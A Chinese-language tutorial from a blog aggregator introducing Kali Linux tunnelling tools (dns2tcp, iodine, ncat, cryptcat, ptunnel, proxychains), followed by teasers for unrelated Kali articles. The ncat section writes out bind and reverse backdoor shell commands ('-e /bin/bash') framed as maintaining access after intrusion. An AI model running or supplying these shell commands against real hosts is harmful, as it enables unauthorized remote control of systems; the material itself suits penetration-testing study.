2016.6.17 kali Linux 隧道工具

隧道工具的基本概念:

1.在计算机网络中,隧道工具是指使用一种网络协议去封装另一种网络协议的技术。

2.通常用来数据伪装或者穿越防火墙,在入侵目标系统后,可用来提升权限和权限维持。

Kali中的隧道工具介绍:

(1)dns2TCP

**是一种把tcp数据包封装成DNS协议数据包的封装工具,适用于目标主机只能发送DNS请求的网络;

**客户端:dns2tcpc

**服务端:dns2tcpd

**缺点:需要有自己的域名,配置dns

(2)iodline

**相比dns2tcp功能更强大,支持协议更多。

(3)Ncat/netcat

**Ncat是Netcat程序的改进版本,功能强大;

**可用于web服务程序和其他tcp/ip协议的客户端;

**简单tcp/udp/sctp/ssl服务端程序;

**转发代理tcp/udp/sctp流量;

**执行系统指令的网络网关;

**使用ssl加密通信数据;

**作为连接代理;

(4)ncat

**创建正向连接back door shell

**创建反向连接back door shell

**正向连接(目标机器在公网,而我们自己在局域网中):

终端输入:ncat -l 1337 -e /bin/bash   //-l参数是listen监听1337端口 -e参数是要执行的shell在bash目录下

在目标主机(192.168.1.103)上中连接:ncat 192.168.1.104   1337   //104是服务器端地址

连接后就有权限操作目标主机的shell了

**反向连接(目标主机在局域网内,而我们具有公网ip)

**或者我们和目标主机都在各自内网中,这时一般做反弹连接,反弹到我们这边的网关或者路由器上的ip地址因为它们有公网ip,然后我们需要在路由器或网关上做指定端口向内网主机指定端口映射:

在攻击主机终端输入:ncat -l 1337  //启动监听1337端口就好

在目标主机终端输入:ncat   192.168.1.104  -e  /bin/bash    //指定反弹的ip地址(即监听机的ip地址),-e参数指定反弹连接后监听机可以启用的shell

(5)cryptcat

**cryptcat是经典的网络工具netcat的加密版,使用twoflish加密算法,其密钥协商过程基于发送,接收双发共享的一个password

**-k指定密码

**-h参数可以看使用参数  -l指定为监听模式  -p指定监听的端口  -s指定监听的ip地址

(6)ICMP隧道工具ptunnel

**使用icmp封装tcp连接的隧道工具

**服务器端:ptunnel

**客户端:ptunnel -p 192.168.1.104(服务器端地址)  -lp  4567(服务器本地端口)  -da  192.168.1.103(目标主机)  -dp 22(目标主机端口)

**ssh命令访问192.168.1.103的主机时,端口转发使命令先转发到192.168.1.104的4567端口上,然后在转发到192.168.1.103的22端口上

(7)通过代理服务器创建隧道

**搭建socks5代理服务器。

**通过代理搭建隧道。

(8)Proxychains工具

**适用于通过代理服务器访问外部网络的情况;

**穿过外联端口的防火墙;

**组成代理服务器链;

**将没有代理的功能的应用使用代理对外链接。telnet。ftp。wget。等

时间: 2024-08-14 15:36:23

2016.6.17 kali Linux 隧道工具的相关文章

隐藏文件到图片或音频中——Kali linux Steghide工具

1. 介绍 Kali Linux操作系统通常被一些安全专家和网络罪犯用来做渗透和审计工作,但是除此之外,这里介绍一个另外的特别的功能:将目标文件隐藏到图片或者音频中.(看起来好诱人的样子,有没有跃跃欲试的感觉,^_^) 2. 安装steghide工具到Kali linux中 如果你的Kali Linux还没有更新过的话,那么执行以下命令进行更新. # apt-get upgrade 当系统更新完毕后,就可以采取在线安装的方式把steghide工具装入到你的系统中. # apt-get insta

kali linux fuzz工具集简述

模糊测试是一种自动化软件测试技术,涉及提供无效,意外或随机数据作为计算机程序的输入. 然后监视程序是否存在异常,例如崩溃,内置代码断言失败或潜在的内存泄漏. 通常,模糊器用于测试采用结构化输入的程序. 例如,以文件格式或协议指定该结构,并将有效与无效输入区分开. 有效的模糊器生成"有效"的半有效输入,因为它们不会被解析器直接拒绝,但会在程序中更深层次地创建意外行为,并且"足够无效"以暴露尚未正确处理的极端情况. Bed.pl BED代表Bruteforce Expl

kali linux 一些工具及命令集1(搜集DNS信息)

DNS信息收集 1.dnsdict6   用于查看ipv6的dns信息,国内很少ipv6,基本无用 2.dnsmap 收集dns信息,同类别还有dnsenum,dnswalk 使用dnsmap需先找到目录,然后再./dnsmap <域名><选项>,域名需去除www 快速收集当前域名及下级域名信息 3. dnsrecon -s -d 带www的网址(-s执行reverse look-up)-d获取显示dns信息的域名 可用于逆向分析范围,扩展顶级域名,为暴力破解提供利用单词目录的dn

Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016

Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016 Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016 0.1  本系列教程说明 本系列教程,采用的大纲母本为<Understanding Network Hacks Attack and Defense with Python>一书,为了解决很多同学对英文书的恐惧,解决看书之后实战过程中遇到的问题而作.由于原书很多地方过于简略,笔者根据实际测试情况和最新的技术发展对内容做了大量的变更,当然最重要的

Kali Linux工具分类

Kali Linux含有可用于渗透测试的各种工具.这些工具程序大体可以分为以下几类: 信息收集:这类工具可用来收集目标的DNS.IDS/IPS.网络扫描.操作系统.路由.SSL.SMB.VPN.VoIP.SNMP信息和E-mail地址. 漏洞评估:这类工具都可以扫描目标系统上的漏洞.部分工具可以检测Cisco网络系统缺陷,有些还可以评估各种数据库系统的安全问题.很多模糊测试软件都属于漏洞评估工具. Web应用:即与Web应用有关的工具.它包括CMS(内容管理系统)扫描器.数据库漏洞利用程序.We

分享Kali Linux 2016.2第46周虚拟机

分享Kali Linux 2016.2第46周虚拟机 该虚拟机使用Kali Linux 2016.2第46周的64位镜像安装.桌面为Gnome模式.该虚拟机配置如下: (1)支持VMWare 9以上的版本.(2)虚拟机Kali系统,内存默认为2GB,单CPU双核,50GB硬盘.(3)已经安装虚拟化增强工具open-vm-tools,请大家不要重复安装.(4)已经安装小企鹅中文输入法.(5)默认账户为root,密码为daxueba.(6)配置的软件源为国内的清华大学源,如果有需要可以删掉,修改为K

Kali Linux 2016.2初体验

前言 Kali Linux官 方于8月30日发布Kali Linux 2016的第二个版本Kali Linux 2016.2.该版本距离Kali Linux 2016.1版本发布,已经有7个月.在这期间,在Kali Linux 2016.2版本发布的这段时间,Kali Linux官方增补了94个更新. 主要的更新大概是这个样子: Kali Linux 2016系统中的音量调整按钮归并到右上角的关闭按钮,点击关闭按钮,就可以看到音量调整滑块按钮. 使 用Kali Linux 2016系统在VMWa

kali linux工具--信息批量收集工具theharvester

在渗透测试早期阶段,安全人员往往需要从互联网快速获取目标的一些信息,以确认测试目标的概况.为了满足这个需求,Kali Linux提供了theharvester工具.该工具可以搜索引擎.社交网站获取目标相关的信息,如邮件地址.子域名.主机.雇员姓名.开放端口等. 由于要满足用户的快速收集信息的需求,该工具默认会收集尽可能多的信息.用户也可以通过选项,限制搜集信息的范围. 使用方法和下载地址.传送门(http://www.freebuf.com/sectool/37765.html)

Kali Linux 安全渗透教程&amp;lt;第三更&amp;gt;1.2 安全渗透所需工具

了解了渗透測试的概念后.接下来就要学习进行渗透測试所使用的各种工具.在做渗透測试之前.须要先了解渗透所需的工具.渗透測试所需的工具如表1-1所看到的: 表1-1  渗透所需工具 splint unhide scrub pscan examiner ht flawfinder srm driftnet rats nwipe binwalk ddrescue firstaidkit-gui scalpel gparted xmount pdfcrack testdisk dc3dd wipe for